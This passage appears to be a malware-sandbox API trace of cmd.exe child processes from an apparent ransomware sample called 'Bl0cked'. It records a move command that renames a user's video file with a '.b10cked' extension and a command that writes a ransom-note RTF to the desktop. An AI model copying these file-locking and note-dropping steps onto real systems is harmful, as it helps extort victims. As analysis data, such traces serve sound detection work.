(_String1="KEYS", _String2="RANDOM") returned -7 [0220.629] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.629] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f548 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.629] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f548, lpFilePart=0x18f544 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f544*="Desktop") returned 0x18 [0220.629] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.629] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f2c4 | out: lpFindFileData=0x18f2c4) returned 0x2b0028 [0220.629] FindClose (in: hFindFile=0x2b0028 | out: hFindFile=0x2b0028) returned 1 [0220.629] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f2c4 | out: lpFindFileData=0x18f2c4) returned 0x2b0028 [0220.629] FindClose (in: hFindFile=0x2b0028 | out: hFindFile=0x2b0028) returned 1 [0220.629] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f2c4 | out: lpFindFileData=0x18f2c4) returned 0x2b0028 [0220.630] FindClose (in: hFindFile=0x2b0028 | out: hFindFile=0x2b0028) returned 1 [0220.630] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.630] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.630] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.630] GetEnvironmentStringsW () returned 0x2b2b08* [0220.630] FreeEnvironmentStringsW (penv=0x2b2b08) returned 1 [0220.630] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.630] GetConsoleOutputCP () returned 0x1b5 [0220.631] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.631] GetUserDefaultLCID () returned 0x409 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f688, cchData=128 | out: lpLCData="0") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f688, cchData=128 | out: lpLCData="0") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f688, cchData=128 | out: lpLCData="1") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.632] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.632] GetConsoleTitleW (in: lpConsoleTitle=0x2a08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.633] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.633] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.633] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.633] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.633] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.633] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.633] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.634] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.634] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.634] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.634] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.636] GetConsoleTitleW (in: lpConsoleTitle=0x18f380, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0222.910] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0222.910] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0222.910] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0222.910] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0222.910] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0222.910] _wcsicmp (_String1="move", _String2="CD") returned 10 [0222.910] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0222.910] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0222.911] _wcsicmp (_String1="move", _String2="REN") returned -5 [0222.911] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0222.911] _wcsicmp (_String1="move", _String2="SET") returned -6 [0222.911] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0222.911] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0222.911] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0222.911] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0222.911] _wcsicmp (_String1="move", _String2="MD") returned 11 [0222.911] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0222.911] _wcsicmp (_String1="move", _String2="RD") returned -5 [0222.911] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0222.911] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0222.911] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0222.911] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0222.911] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0222.911] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0222.911] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0222.911] _wcsicmp (_String1="move", _String2="VER") returned -9 [0222.911] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0222.911] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0222.911] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0222.911] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0222.911] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0222.911] _wcsicmp (_String1="move", _String2="START") returned -6 [0222.911] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0222.911] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0222.911] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0222.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.913] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f13c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f134, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f134*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0222.914] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0222.914] _wcsicmp (_String1="BON4K7~1.AVI", _String2=".") returned 52 [0222.914] _wcsicmp (_String1="BON4K7~1.AVI", _String2="..") returned 52 [0222.915] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7~1.avi")) returned 0x20 [0222.915] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0222.915] SetErrorMode (uMode=0x0) returned 0x0 [0222.915] SetErrorMode (uMode=0x1) returned 0x0 [0222.915] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", nBufferLength=0x104, lpBuffer=0x18eac4, lpFilePart=0x18eaac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", lpFilePart=0x18eaac*="BON4K7~1.AVI") returned 0x2a [0222.915] SetErrorMode (uMode=0x0) returned 0x1 [0222.915] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI" (normalized: "c:\\users\\eebsym5\\desktop\\gbki")) returned 0x10 [0222.915] _wcsicmp (_String1="BON4K7~1.AVI", _String2=".") returned 52 [0222.915] _wcsicmp (_String1="BON4K7~1.AVI", _String2="..") returned 52 [0222.915] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7~1.avi")) returned 0x20 [0222.915] SetErrorMode (uMode=0x0) returned 0x0 [0222.915] SetErrorMode (uMode=0x1) returned 0x0 [0222.915] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", nBufferLength=0x104, lpBuffer=0x18ef40, lpFilePart=0x18ecd8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", lpFilePart=0x18ecd8*="BON4K7~1.AVI") returned 0x2a [0222.915] SetErrorMode (uMode=0x0) returned 0x1 [0222.916] SetErrorMode (uMode=0x0) returned 0x0 [0222.916] SetErrorMode (uMode=0x1) returned 0x0 [0222.916] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked", nBufferLength=0x104, lpBuffer=0x18f148, lpFilePart=0x18ecd8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked", lpFilePart=0x18ecd8*="bON4k7zjy0QFC_kDVvV.avi.b10cked") returned 0x3d [0222.916] SetErrorMode (uMode=0x0) returned 0x1 [0222.916] SetLastError (dwErrCode=0x0) [0222.916] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7zjy0qfc_kdvvv.avi.b10cked")) returned 0xffffffff [0222.916] GetLastError () returned 0x2 [0222.916] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", fInfoLevelId=0x1, lpFindFileData=0x18e654, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e654) returned 0x2a0eb0 [0222.916] FindNextFileW (in: hFindFile=0x2a0eb0, lpFindFileData=0x18e654 | out: lpFindFileData=0x18e654) returned 0 [0222.917] GetLastError () returned 0x12 [0222.917] FindClose (in: hFindFile=0x2a0eb0 | out: hFindFile=0x2a0eb0) returned 1 [0222.918] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", fInfoLevelId=0x1, lpFindFileData=0x2b1c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1c08) returned 0x2a0eb0 [0222.918] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked", nBufferLength=0x104, lpBuffer=0x18e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked", lpFilePart=0x0) returned 0x3d [0222.918] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi", nBufferLength=0x104, lpBuffer=0x18e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi", lpFilePart=0x0) returned 0x35 [0222.918] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7zjy0qfc_kdvvv.avi")) returned 0x20 [0222.918] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7zjy0qfc_kdvvv.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7zjy0qfc_kdvvv.avi.b10cked"), dwFlags=0x3) returned 1 [0222.919] FindClose (in: hFindFile=0x2a0eb0 | out: hFindFile=0x2a0eb0) returned 1 [0222.919] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e8a0 | out: _Buffer=" 1") returned 9 [0222.919] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.919] GetFileType (hFile=0x7) returned 0x2 [0222.919] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.919] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e82c | out: lpMode=0x18e82c) returned 1 [0222.919] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e860 | out: lpConsoleScreenBufferInfo=0x18e860) returned 1 [0222.920] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.920] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x18e8a0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.920] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e884, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x18e884*=0x1a) returned 1 [0222.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.921] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.921] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.921] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.921] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.921] SetConsoleInputExeNameW () returned 0x1 [0222.921] GetConsoleOutputCP () returned 0x1b5 [0222.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.921] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.921] exit (_Code=0) Process: id = "580" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d20" os_pid = "0xddc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32964 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32965 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32966 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32967 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32968 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32969 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32970 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32971 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32972 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 32973 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33008 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33009 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33010 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33011 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 33012 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 33013 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33014 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33015 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33016 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33017 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33018 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33019 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33020 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33021 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33022 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 33023 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33024 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33025 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33026 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33027 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33028 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33029 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 33030 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 33031 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 784 os_tid = 0xe1c [0220.148] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f7a4 | out: lpSystemTimeAsFileTime=0x26f7a4*(dwLowDateTime=0xb8050b40, dwHighDateTime=0x1d440a9)) [0220.148] GetCurrentProcessId () returned 0xddc [0220.148] GetCurrentThreadId () returned 0xe1c [0220.148] GetTickCount () returned 0x3d73b [0220.148] QueryPerformanceCounter (in: lpPerformanceCount=0x26f79c | out: lpPerformanceCount=0x26f79c*=27693766822) returned 1 [0220.149] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.149] __set_app_type (_Type=0x1) [0220.149] __p__fmode () returned 0x76b331f4 [0220.149] __p__commode () returned 0x76b331fc [0220.149] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.149] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.150] GetCurrentThreadId () returned 0xe1c [0220.150] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe1c) returned 0x38 [0220.150] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.150] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.150] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.173] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.173] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f734 | out: phkResult=0x26f734*=0x0) returned 0x2 [0220.173] VirtualQuery (in: lpAddress=0x26f76b, lpBuffer=0x26f704, dwLength=0x1c | out: lpBuffer=0x26f704*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.173] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f704, dwLength=0x1c | out: 